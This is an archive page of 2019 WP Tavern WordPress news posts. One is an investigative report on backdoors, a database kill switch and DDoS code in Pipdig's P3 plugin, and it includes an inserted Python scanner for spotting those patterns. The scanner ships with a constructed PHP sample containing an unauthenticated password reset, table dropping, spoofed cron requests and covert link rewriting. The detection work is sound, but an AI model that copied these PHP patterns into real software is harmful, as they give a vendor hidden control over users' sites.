Monthly Archives: April 2019

WPWeekly Episode 350 – Don’t Touch My Plugin Search Results

In this episode, John James Jacoby and I discuss a controversial feature in Jetpack 7.1 that adds feature suggestions to plugin search results. We also talk about extension suggestions that are coming to WooCommerce.

We talk about the security implications from the recent investigations into the Pipdig plugin and what users can do about it. Near the end of the show, we send a shout-out to Carole Olinger for her contributions to the WordPress community.

Stories Discussed:

Pipdig Updates P3 Plugin after Reports Expose Vendor Backdoors, Built-in Kill Switch, and Malicious DDoS Code

Jetpack 7.1 Adds Feature Suggestions to Plugin Search Results

Extension Suggestions in 3.6

On Health, WordPress and a Tough Decision

WPWeekly Meta:

Next Episode: Wednesday, April 10th 3:00 P.M. Eastern


Source: WP Tavern

Jetpack Is Promoting Paid Upgrades on Plugin Search Screen, WordPress Plugin Team Says it “May be a Violation” of Directory Guidelines

Yesterday the discussion surrounding Jetpack’s implementation of feature suggestions in the plugin search screen became heated after developers pointed out that Automattic is also using these suggestions to promote paid upgrades. You can test this by searching for “backups” where you find that Jetpack’s commercial offering takes the place of the first result, pushing all other results further down one slot.

The feature suggestions were added in version 7.1 to inform users of an existing feature in Jetpack when they search for something similar. The Jetpack team said they developed it to solve a discovery problem, where users are quite often not familiar with all of Jetpack’s 45 modules and end up installing plugins to perform functionality that Jetpack already includes. A PR in the Jetpack repository has been merged to only show feature suggestions when the user’s plan supports it, so it looks like these promotions for commercial features will be removed in a future release of the plugin.

It’s not clear whether Automattic intentionally rolled out the feature suggestions in its current form (with paid upgrades included) to test the waters and gauge the community’s reaction, or if it is simply a mistake. The PR was marked as an enhancement, not a bug.

According to Plugin Team member Samuel “Otto” Wood, feature suggestions with paid upgrades included is “likely a violation” of the plugin directory’s guidelines.

“Promoting other plugins or premium upgrades in the same space would likely not be allowed, because it would be misleading or an incorrect place to put ‘advertising,’ Wood said. “Guidelines already say not to do that.”

I contacted the Plugin Team today and it seems the topic of feature suggestions on the plugin screen are still a matter of ongoing debate. The team would not officially confirm whether or not Jetpack is currently in violation.

“I can’t confirm that at this time,” Mika Epstein said. “It might be a violation, but it also may not be. Much of that comes down to intent.

“A case can be made that they’re promoting paid services for existing features, and is that different from an image-optimizer plugin promoting its own service which you’re already using? It’s not like they’re promoting separate plugins, so it’s in a very odd grey area for services.”

Epstein said the team is “still arguing the semantics internally about that one.”

Many people have asked why Jetpack has not been removed from the plugin directory for advertising its commercial offerings on the plugin screen. The Plugin Team’s official response is that if Jetpack is in violation, they reserve the right to make an exception and opt not to close it. Epstein, on behalf of the team, offered the following statement:

It falls under our 18th guideline:

We reserve the right to NOT close a plugin and grant exceptions.

Closing plugins is ALWAYS a tricky thing. We regularly warn, and do not close, larger plugins as closing them would have an adverse impact on the entire WordPress community. Closing plugins with 500,000 users can be more harmful than helpful, even when there are security problems. The more users a plugin gets, the more difficult it is to weigh the risks of closing versus not closing.

Maintaining the trust in larger plugins is as important as doing so with the directory as a whole. With so many outlets wanting to spin up FUD and blast outrage at everyone involved as their first reaction, we try to stem the tide a little and not act like the sky is falling all the time.

Jetpack has more than 5 million active installs. If it is found to be in violation of the guidelines, it is not likely to be removed due to the impact it would have on millions of WordPress users, not to mention the hosts who have it pre-installed on WordPress hosting plans.

The discussion regarding how WordPress can improve the implementation of feature suggestions on the plugin screen for all plugins is happening in a ticket on trac opened by Joost de Valk. This ticket does not debate whether or not feature suggestions are a good idea in general but rather focuses on how results can better communicate that a feature is already active or available. de Valk shared a screenshot of what the screen currently looks like when a user searches for a plugin for which they already have a match installed:

“The disabled ‘Active’ button there is not very useful, as it doesn’t provide any context as to why that button is disabled,” de Valk said. “I’d like to propose a change: let’s turn this into two separate groups of results, one that says ‘these plugins you already have installed might be able to help’ and then a second group below that with other plugins.”

Tim Hengeveld posted a mockup of what an implementation of that might look like:

The topic of feature suggestions on this screen is still highly controversial, despite the Plugin Team confirming that it is not breaking the guidelines (as long as plugins don’t promote paid upgrades). Plugin authors have worked for years towards better rankings on this screen by providing quality support and updates that translate into better ratings and more installs. Any mega plugin that offers multiple modules packed into one can easily usurp these rankings by suggesting its own features and having them automatically appear in that top slot. These features could even be broken down into multiple micro-modules so that there is always something to suggest.

Many in the WordPress development community are worried that plugin authors will move towards distributing their work as large suites of modules in order to take advantage of promoting their own features in the plugin search screen. This seems even more likely with block developers releasing massive collections of Gutenberg blocks.

WordPress.org is at a crossroads here that may open the floodgates to plugin authors looking to leverage this screen to their own advantage. Jetpack’s move to suggest its own features on this screen, instead of opting for an admin notice or using its own dashboard, is going to have a major ripple effect throughout the plugin ecosystem that has the potential to change how plugins are packaged, distributed, and marketed.

Source: WP Tavern

Pipdig Updates P3 Plugin after Reports Expose Vendor Backdoors, Built-in Kill Switch, and Malicious DDoS Code

Over the weekend, Pipdig, a small commercial theme company, has been at the center of a scandal after multiple reports exposed a litany of unethical code additions to its Pipdig Power Pack (P3) plugin.

On Friday, March 29, Wordfence threat analyst Mikey Veenstra published a report with code examples of the backdoors Pipdig built into their plugin, along with some unsavory and questionable additions to the code.

“We have confirmed that the plugin, Pipdig Power Pack (or P3), contains code which has been obfuscated with misleading variable names, function names, and comments in order to hide these capabilities,” Veenstra said.

These include an unauthenticated password reset to a hard-coded string, deliberately obscured with a code comment claiming it was added to “check for new social channels to add to navbar.” Veenstra also demonstrated that the plugin contained code for an unauthenticated database deletion, which would let the Pipdig team remotely destroy any WordPress site using the P3 plugin.

The code for remote site deletion was removed in version 4.8.0, but it is still a concern for users who haven’t updated. Michael Waterfall, iOS Engineer at ASOS, tested the “kill switch” function and demonstrated that it still works in prior versions.

Veenstra’s investigation also uncovered questionable remote calls in the plugin’s cron events, undisclosed content and configuration rewrites, and a list of popular plugins that are deactivated when P3 is activated, without the user’s knowledge. He found that some of these plugins are deactivated on the admin_init hook, which runs on every admin page load, so any attempt by the user to reactivate them will not stick.

Wordfence estimates the P3 plugin to have an install base of 10,000-15,000 sites. The changes made in version 4.8.0 of the plugin are not transparently identified in the changelog, so it’s not easy for users to know what has changed. The content filtering and the plugin deactivations remain in the most recent release. These types of veiled functions performed without permission could have unintended consequences on sites using the plugin, which non-technical users may not be able to fix themselves.

Pipdig P3 Plugin Performed a DDoS Attack on a Competitor’s Site

Jem Turner, a freelance web developer based in the UK, published a lengthy analysis of the P3 plugin the same day that Wordfence released its analysis. She drilled down further into the remote requests, demonstrating how Pipdig has been using the P3 plugin to perform a DDoS attack on a competitor who also provides WordPress themes and installation services to bloggers. The code triggers an hourly cron job on users’ sites, effectively using their customers’ servers to send malicious requests to the competitor’s site.

The code comment tells us this is “checking the CDN (content delivery network) cache”. It’s not. This is performing a GET request on a file (id39dqm3c0_license_h.txt) sat on pipdigz.co.uk, which yesterday morning returned ‘https://kotrynabassdesign.com/wp-admin/admin-ajax.php’ in the response body.

Every single hour night and day, without any manual intervention, any blogger running the pipdig plugin will send a request with a faked User Agent to ‘https://kotrynabassdesign.com/wp-admin/admin-ajax.php’ with a random number string attached. This is effectively performing a small scale DDoS (Distributed Denial of Service) on kotrynabassdesign.com’s server.

Turner also contacted Kotryna Bass, Pipdig’s competitor, who said she had contacted her host after finding that her admin-ajax.php file was under some kind of attack. Bass’ exchanges with her host are also published in Turner’s report.

Turner’s post explained how Pipdig’s P3 plugin code manipulated links to point to their own products and services when a user includes a link to a competitor in the content:

Here we have pipdig’s plugin searching for mentions of ‘blogerize.com‘ with the string split in two and rejoined – concatenated – to make it harder to find mentions of competitors when doing a mass ‘Find in Files’ across the plugin (amongst other things). When the plugin finds links to blogerize.com in bloggers’ content (posts, pages), they’re swapped out with a link to ‘pipdig.co/shop/blogger-to-wordpress-migration/’ i.e. pipdig’s own blog migration services. Swapping these links out boosts the SEO benefit to pipdig, and the vast majority of bloggers wouldn’t notice the switcheroo (especially as, if the page/post was edited, the link to blogerize would appear in the backend as normal).

The plugin did not ask users’ permission before performing any of these actions and most of them were implemented with obfuscated code. Turner’s investigation also covers how the P3 plugin could harvest data and change admin passwords. Many of the findings overlap with Wordfence’s analysis.
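The behaviours Wordfence and Turner describe above all leave recognisable marks in plugin source: a password reset to a hard-coded string reachable without authentication, a routine that drops every table with the site prefix, an hourly cron callback that fetches a target URL and then requests it with a spoofed User-Agent, plugins re-deactivated on admin_init, and competitor domains split across concatenated string literals so a ‘Find in Files’ misses them. The following is an added example of a heuristic scanner for those marks; it is not Wordfence’s, Turner’s or Pipdig’s code. The PHP it scans is a constructed sample that merely imitates the reported patterns: the function and hook names, the example.invalid URLs and the some-cache plugin slug are all made up for illustration.

```python
"""Heuristic scan of WordPress plugin PHP for the behaviour patterns reported above.
Added example, not Wordfence's, Turner's or Pipdig's code; SAMPLE_PHP below is constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    rule: str
    line: int
    detail: str

FUNC_RE = re.compile(r"\bfunction\s+(\w+)\s*\([^)]*\)\s*\{")
HOOK_RE = re.compile(r"add_(?:action|filter)\s*\(\s*['\"]([\w/]+)['\"]\s*,\s*['\"](\w+)['\"]")
SCHEDULE_RE = re.compile(r"wp_schedule_event\s*\([^;]*?['\"](\w+)['\"]\s*\)")  # last arg is the hook name
REMOTE_RE = re.compile(r"\b(?:wp_remote_(?:get|post|request)|file_get_contents|curl_init)\s*\(")
DROP_RE = re.compile(r"\bDROP\s+TABLE\b", re.I)
SETPW_LITERAL_RE = re.compile(r"wp_set_password\s*\(\s*['\"][^'\"]*['\"]")
DANGER_RE = re.compile(r"\b(?:DROP\s+TABLE|wp_set_password|deactivate_plugins|wp_delete_user)\b", re.I)
INPUT_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
AUTHZ_RE = re.compile(r"\b(?:current_user_can|wp_verify_nonce|check_admin_referer|check_ajax_referer)\s*\(")
CONCAT_RE = re.compile(r"(['\"])([\w-]+)\1\s*\.\s*(['\"])([\w.-]+)\3")  # e.g. 'blog' . 'erize.com'
REQUEST_HOOKS = {"init", "wp", "wp_loaded", "plugins_loaded", "admin_init", "template_redirect"}
TLDS = ("com", "net", "org", "io", "co", "co.uk")

def line_of(src: str, pos: int) -> int:
    return src.count("\n", 0, pos) + 1

def function_bodies(src: str) -> dict[str, tuple[int, str]]:
    """Map function name -> (line, body) by naive brace counting (no string/comment awareness)."""
    out = {}
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        out[m.group(1)] = (line_of(src, m.start()), src[m.end():i - 1])
    return out

def scan(src: str) -> list[Finding]:
    funcs = function_bodies(src)
    hooks: dict[str, list[str]] = {}
    for m in HOOK_RE.finditer(src):
        hooks.setdefault(m.group(1), []).append(m.group(2))
    cron_hooks = {m.group(1) for m in SCHEDULE_RE.finditer(src)}
    found: list[Finding] = []
    # File-wide markers: table dropping ("reset"/kill switch), password reset to a literal,
    # and domain names split across concatenated literals so a plain grep misses them.
    found += [Finding("drop-table", line_of(src, m.start()), m.group(0)) for m in DROP_RE.finditer(src)]
    found += [Finding("hardcoded-password", line_of(src, m.start()), m.group(0)) for m in SETPW_LITERAL_RE.finditer(src)]
    for m in CONCAT_RE.finditer(src):
        joined = (m.group(2) + m.group(4)).lower()
        if any(joined.endswith("." + t) for t in TLDS):
            found.append(Finding("split-string-domain", line_of(src, m.start()), joined))
    # Hook-driven behaviour: resolve each registered callback and read its body.
    for hook, callbacks in hooks.items():
        for cb in callbacks:
            line, body = funcs.get(cb, (0, ""))  # callbacks not defined in this file are skipped
            if hook in cron_hooks and REMOTE_RE.search(body):
                found.append(Finding("cron-remote-call", line, f"{cb}() makes remote requests on cron hook {hook}"))
            if hook == "admin_init" and "deactivate_plugins" in body:
                found.append(Finding("admin_init-deactivation", line, f"{cb}() re-deactivates plugins on every admin load"))
            if hook in REQUEST_HOOKS and INPUT_RE.search(body) and DANGER_RE.search(body) and not AUTHZ_RE.search(body):
                found.append(Finding("unauthenticated-dangerous-action", line, f"{cb}() acts on request input with no capability or nonce check"))
    return found

SAMPLE_PHP = """<?php
// Constructed sample imitating the reported patterns; not Pipdig's code. Names and URLs are made up.
function p3_check_social_channels() {               // misleading name, as in the reports
    if ( isset( $_GET['refresh_social'] ) ) {
        wp_set_password( 'p3-default-pass', 1 );    // resets user 1, no capability or nonce check
    }
}
add_action( 'init', 'p3_check_social_channels' );
function p3_reset_site() {
    global $wpdb;
    foreach ( $wpdb->get_col( "SHOW TABLES LIKE '{$wpdb->prefix}%'" ) as $t ) {
        $wpdb->query( "DROP TABLE $t" );
    }
}
function p3_check_cdn_cache() {                     // "checking the CDN cache"
    $target = wp_remote_retrieve_body( wp_remote_get( 'https://example.invalid/license.txt' ) );
    wp_remote_get( $target . '?' . rand(), array( 'user-agent' => 'Mozilla/5.0' ) );
}
add_action( 'p3_hourly', 'p3_check_cdn_cache' );
wp_schedule_event( time(), 'hourly', 'p3_hourly' );
function p3_tidy_plugins() {
    deactivate_plugins( 'some-cache/some-cache.php' );
}
add_action( 'admin_init', 'p3_tidy_plugins' );
function p3_fix_links( $content ) {
    return str_replace( 'blog' . 'erize.com', 'example.invalid/shop/migration', $content );
}
add_filter( 'the_content', 'p3_fix_links' );
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_PHP):
        print(f"line {f.line:3d}  {f.rule:32s} {f.detail}")
```

Run scan() over every .php file under wp-content/plugins/ (and the theme directory, since companion code often lives there) and read each hit in context. The scanner is deliberately noisy: a legitimate uninstall routine also drops its own tables, and any plugin that syncs with a remote service calls wp_remote_get() from cron, so hits are things to read, not verdicts. The finding that matters most is a dangerous call inside a callback on init or admin_init that reads request input and never calls current_user_can() or verifies a nonce, because that combination is exactly what turns a “reset” function into a remote kill switch.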

“I was aware that Wordfence had been contacted for an opinion, although I was unaware they were writing a post and vice versa,” Turner said. “I wasn’t surprised that they wrote about it though, given the risk to WordPress users.”

She has been in contact with authorities regarding Pipdig’s unethical coding practices and privacy violations.

“From my side of things, I’ve been in contact with Action Fraud (submitted a report through their website) and NCSC (who pointed me back to Action Fraud and gave me a number to call). From pipdig’s side, there are threats of legal action in their blog post but I’ve received nothing yet.”

Pipdig’s Public Response Skirts Critical Concerns

Pipdig Creative Director Phil Clothier published a public response from the company which opens by characterizing the recent investigations as “various accusations and rumours spreading about pipdig” and includes an emotional plea regarding how distressing recent developments have been for his company. He claims that his team and their supporters are being harassed.

After pushing out the 4.8.0 version of the P3 plugin, removing some but not all of the offensive code, Clothier opts for a Q&A style format for his post, putting every question in the present tense:

Do you DDOS competitors?
No.

Do you “kill” sites?
No!

Do you have the ability to kill sites via the pipdig Power Pack?
No

Regarding the “kill switch” feature they built in, which detects all tables with the WordPress prefix and drops each of them, Clothier said it was simply a function to reset a site back to its default settings. He deliberately misrepresented what it does:

There was a function in an older version of the plugin which could be used to reset a site back to the default settings. This function had no risk of malicious or unintentional use. I can say categorically that there was no risk to your site if you were using a pipdig theme. This feature has been dug up and labelled a “Kill Switch” for maximum negative impact on us.

Clothier claims the function was available in the P3 plugin in July 2018 when a third party started posting Pipdig themes for sale on their own site:

A 3rd party was able to download all of our themes illegitimately and post them on a clone of our own site. This included previews of our themes and the ability to purchase them. We were first alerted to this by people who had purchased a pipdig theme from there, but were finding that certain features did not work correctly. After investigation, we found that the victim had purchased the theme from the 3rd party, thinking it was us. The 3rd party not only gained the financial benefit of the theme payment, but also used it as a way to inject malware and ads into the victim’s site. The reset function was put in place in order to remove the 3rd party’s ability to host preview sites with our themes. It worked, and they have since disappeared. The function was then removed in a later version of the plugin.

This is a false claim, as Wordfence pointed out in an updated article. The first instance of the code responsible for database deletion was committed to the plugin in November 2017.

The company failed to address the most critical concerns presented in the Wordfence analysis in its first pass at issuing a public statement. Instead, on the matter of coordinating a DDoS attack on competitors, Pipdig blames users and suggests they may have added the competitor’s URL to their sites.

“We’re now looking into why this function is returning this url,” Clothier said. “However, it seems to suggest that some of the ‘Author URLs’ have been set to ‘kotrynabassdesign.com’. We don’t currently know why this is the case, or whether the site owner has intentionally changed this.”

Further investigations published by Wordfence today showed that Pipdig also added DDoS code to its Blogger templates and was actively issuing malicious requests up until yesterday:

During the investigation of Pipdig’s WordPress plugin and themes, we also came across some curious code associated with their Blogger themes. This code is part of Pipdig’s suspected DDoS campaign against their competitor, and was active until April 1, four days after Pipdig’s denial of any such behavior.

Some of Pipdig’s Blogger themes have been confirmed to make external JavaScript calls to Pipdig’s server, specifically to the script hXXps://pipdigz[.]co[.]uk/js/zeplin1.js.

On March 31, as the investigations became public, Pipdig deleted its public Bitbucket repository and replaced it with a “clean one,” removing three years of commit history. Wordfence and many others cloned the repository before it was deleted and saved snapshots of pages to cite in the investigation.

Pipdig’s public statement contains a number of other false claims that are outlined in Wordfence’s followup piece with code examples. Clothier closes the article by casting aspersions on the press, presumably to encourage customers not to trust what they read from other sources.

I contacted Pipdig for their comment on recent events, but Clothier declined to answer any of my questions. One of those was why the plugin disables Bluehost’s caching plugin without informing customers.

Clothier said he didn’t have any comments beyond what he said in the public statement but encouraged anyone interested to read the new comments added to the code in version 4.9.0:

We’ve also updated version 4.9.0 of the plugin which includes extra commenting in the code, which will hopefully help clear things up like issues with Bluehost caching and the_content() filter.

If anyone is unsure, we recommend updating to the latest version as always. However we also contend that the previous versions had no serious issues too.

Pipdig declined to answer questions about licensing but the products do not appear to be GPL-licensed. This may be why the company deemed it within its rights to take action on those who they believe to have “stolen” their themes.

Pipdig Customers Share Mixed Reactions to Reports of Vendor Backdoors and DDoS Attacks

In what is perhaps one of the most brazen abuses I’ve ever seen from a theme company in WordPress’ history, Pipdig’s user base has unknowingly been used to target the company’s competitors. Regardless of the company’s motive in combatting the unauthorized distribution of their themes, these types of backdoors and undisclosed content rewrites are indefensible. They prey upon user trust and in this case the victims were primarily bloggers.

One of the more puzzling aspects of this story is that many of Pipdig’s users seem to be unfazed by the gravity of the findings in these reports. Without full knowledge of the inner workings of a product, many customers make decisions based on how they feel about a company, regardless of being confronted with facts that should cause them to question their experiences.

Others are angry to have had their sites used in an attack. Getting set up on a new theme is not a trivial task for non-technical users who may have had to pay a developer to launch their sites in the first place.

“My mind is absolutely blown by pipdig’s public response,” Jem Turner said. “I understand that they were counting on their users’ completely non-tech background to bamboozle them, and it certainly seemed to be working in the beginning, but anyone with even the slightest bit of coding knowledge can see that they are lying and I genuinely don’t understand how they think they’ll get away with it.”

This incident shines a spotlight on how unregulated the commercial plugin and theme ecosystem is and how little protection users have from companies that abuse their power. If you are a Pipdig customer affected by this incident, there is no assurance that the company will not build more backdoors into your site in the future. The plugin updates are not reviewed by any kind of authority. Fortunately, there are a few actions you can take to create a safer environment for your website.

First, look for GPL-licensed themes and plugins, because they grant you more freedoms as the user and are compatible with WordPress’ legal license. GPL-licensed products are also a strong indication that the authors respect user freedoms and the shared economic principles that this open source license supports.

Many reputable theme companies choose to host their products’ companion plugins on WordPress.org for ease of distribution and shipping updates. The official directory does not permit the kinds of shady coding practices described in this article, and every plugin is reviewed by the WordPress Plugin Team before it is first listed. That review is a one-time gate: later updates are not individually re-reviewed, though the team can close a plugin when problems are reported, and the directory’s public version history at least lets anyone see what changed between releases, which is more than a privately distributed plugin like P3 offers. If you are concerned about code quality and the potential for abuse, do a little research on your next prospective commercial theme provider or opt for free WordPress.org-hosted themes and plugins that have undergone this vetting.

Source: WP Tavern

Jetpack 7.1 Adds Feature Suggestions to Plugin Search Results

Jetpack 7.1 was released earlier this month with new blocks for WordAds, Business Hours, Contact Info, Slideshows, and Videos. This release also quietly added suggestions to the plugin search screen, a change that has not been well-received by the developer community. If a user searches for a plugin that has a feature that is already offered by Jetpack, the plugin will insert an artificial (and dismissible) search result into the first plugin card slot, identifying the corresponding Jetpack feature.

Although these suggestions in plugin search results were not presented as a headline feature in the 7.1 release post, they were clearly listed in the changelog under enhancements. More people began taking notice after WordPress developer Mehul Gohil tweeted a screenshot of it on a live site:

Manipulating search results, even to insert an artificial result, using a plugin that is already installed, is a major new development among plugins hosted on WordPress.org. Automattic is setting a precedent for other plugin authors that want to recommend their own add-ons or extensions when users match certain search terms.

In the feature’s initial proof of concept, Jetpack product lead Beau Lebens explained the motivation behind adding suggestions to the search screen:

We’ve seen that people with Jetpack installed and activated often search for Jetpack features (even by name) in the Plugins > Add New screen in wp-admin. This new module attempts to spot those searches, and provide an artificial search result that calls out that what they’re looking for is in Jetpack, which they already have, and which is already active.

Eight years since its initial release, Jetpack has grown to 45 modules. Most users are not familiar with everything the plugin offers. In fact, many users may not have even installed Jetpack themselves, as it often comes pre-installed with hosting. The suggestions may prevent users from adding alternate third-party plugins, as Jetpack’s module placement in the results subtly implies that these are inferior options to its existing modules.

One of the reasons the feature has many developers rattled is because the UI fails to make it clear that this is an artificial result and not something generated by the plugin directory’s algorithm. Although it is intended to function more as a notice, for the regular user, it is virtually indistinguishable from an advertisement in its current implementation. It hasn’t been live for very long, but over time it may even make it more difficult for plugin developers to offer plugins that compete with Jetpack features.

The feature suggestions in plugin search results became a hot topic on Post Status‘ Slack where Automattic’s Gary Pendergast dropped in to reiterate the Jetpack team’s intentions.

“I’ve been talking to some folks on Jetpack about what’s going on,” Pendergast said. “I think the team’s end goal is pretty good, and it solves a real problem WordPress has. Too often, site owners install masses of plugins that they don’t need, which ultimately creates all sorts of security, performance, and stability issues. In this particular use case, if a site owner is looking for functionality that Jetpack already handles, then the owner should be aware of that.”

Pendergast also said he thinks WordPress core should offer an API for any plugin to be able to do something similar.

Plugin Team Says Jetpack’s Artificial Search Results Do Not Break WordPress.org Guidelines

Although it’s easy to conjure up different ways to abuse this avenue for advertising a plugin’s existing features, WordPress.org’s plugin team is ready to deal with a potential influx of various implementations on a case-by-case basis.

“It’s not really advertising anything – it’s just adding search results for pieces of a plugin that you already have and might not know about, so it’s not really against any rules,” Samuel “Otto” Wood said. “If it was misleading in some manner, then that would be different.”

Wood said the team discussed it but concluded that any implementation of something similar in other plugins will need to be reviewed to see if it’s doing anything misleading.

“Realistically it’s always going to be a judgment call of some sort,” Wood said. “For example, if a plugin was to insert search results for other plugins, then that wouldn’t be okay, because it’s misleading. But, this isn’t that case. It’s just trying to say ‘hey, you have a plugin already installed which does what you’re looking for,’ so it’s trying to be helpful in that respect. It may not necessarily be the best way of accomplishing that goal, admittedly. But it’s pretty valid.”

Wood did not place a hard requirement on having the artificial result be dismissible but said anytime a developer inserts something into a screen where would not normally be, having dismiss functionality is good UX. He doesn’t think it’s likely that many other plugin authors will implement something similar since most are not collections of dozens of plugins and add-ons. However, this type of suggestion seems like it would also be applicable to block collection plugins that include dozens of Gutenberg blocks.

“It will be really difficult for users when all the essential plugin authors implement it,” Gohil said in response to comments on the screenshot he tweeted. “They are using JS to hack into plugin search using hook ‘admin_enqueue_scripts’ and that’s not good. I’m not in favor of it.”

If more plugin authors begin adding suggestions, users could see several rows of artificial results before seeing any real ones, depending on which plugins they have installed. Plugin developers are already brainstorming ways to strip the feature suggestions out. It likely will not be long before plugins like Hide Jetpack Promotions remove the artificial search results to preserve the results as delivered by WordPress.org.

Wood said the plugin team does not intend to write any new guidelines for plugin authors creating their own implementations of feature suggestions on the search screen.

“The difference is always going to be one of intent,” Wood said. “It’s JP’s intent here to notify the user of the existence of a feature they may not know about. That’s trying to be helpful to the user, not trying to shut out competition. It doesn’t remove search results. It doesn’t reorder them or filter them. It just adds a card about the feature you’re searching for. If you don’t have JP, then it can’t do anything. It’s not advertising for other plugins or anything like that.”

Jetpack is also tracking search terms longer than three characters, and Wood confirmed that this is also within the guidelines, as long as it is disclosed to the user.

“The whole tracking module doesn’t activate until after you agree to the ToS thingy, so honestly, it’s allowed,” Wood said. “They track lots of things for stats and such. Realistically, so do many other plugins. As long as you ask the user first, before tracking anything, then tracking data is allowed. Opt-in is the rule.”

Wood said he found the search term tracking to be unnecessary since WordPress.org already collects this information through its new search system that runs on ElasticSearch.

“We get all the search terms on the WordPress.org servers, anyway, so both we and they kinda already have them,” Wood said. “Automatticians built our newest plugin search engine, after all. It seems kind of a waste to track them using Jetpack when they literally receive all the searches to run through the search engine.”

Jetpack’s artificial search results, although dismissible, take up the top spot, bypassing the algorithm altogether. It gives the appearance that Jetpack’s built-in feature is either a promoted listing or superior to all other options available in the directory.

Although a suggested module may work more harmoniously with other Jetpack features than a third-party plugin, the modules are built to be fairly general in terms of features. They address the basic needs for the largest number of users but rarely provide more options than a standalone plugin dedicated to performing something similar. Users may very well be searching for a replacement for what Jetpack provides. The ability to easily turn off suggestions in search results with a toggle could go a long way for diplomacy.

Source: WP Tavern

Automattic Launches Happy Tools Product Line for Distributed Teams

Automattic has released Happy Schedule, the first in a new line of products called “Happy Tools,” created to solve problems for distributed teams. The products have grown out of internal tools that Automattic uses with its distributed team of more than 850 employees in 68 countries.

Most employee scheduling tools are designed for more traditional work environments where people report to work in person in the same timezone. Happy Schedule allows employees to set their own flexible schedules all the way down to 15-minute increments, seamlessly managing timezones for team members in one calendar. Automattic uses it to manage 24-hour global support with its 300+ Happiness Engineers.

Happy Tools is currently priced at $60/month for 12 users and then $5/user after that.

“In addition to Happy Schedule, we’ll be looking to bring our customer chat tool into Happy Tools,” Happy Tools product lead Matt Wondra said. “We’ll also look at other applications Automattic has already built to help with team communication, people-management, and customer support.”

The product suite complements Matt Mullenweg’s recent TED talk in which he evangelizes distributed work as “the future of work.” Mullenweg predicts that companies will evolve to become distributed first or will soon be replaced by ones that are.

Beyond simply recognizing the benefits of employees being able to design their own work environments, there are some real challenges to becoming a distributed company. This is especially true for those that didn’t start out that way. Smaller companies have less experience navigating all the tax laws and legal processes around hiring people from different countries. These hurdles make it difficult to grow an international team and retain employees as anything more than hourly contractors.

Answering some of these difficult questions gets into the meat of making distributed teams a reality. With its position as one of the few distributed companies that has successfully scaled into the hundreds, Automattic has an opportunity to open source some of its counsel, documents, and HR guides around international hiring. This would be a valuable addition to distributed.blog or the Happy Tools blog that would help more companies move beyond their initial explorations of distributed work and ultimately create a larger market for these kinds of tools.

Source: WP Tavern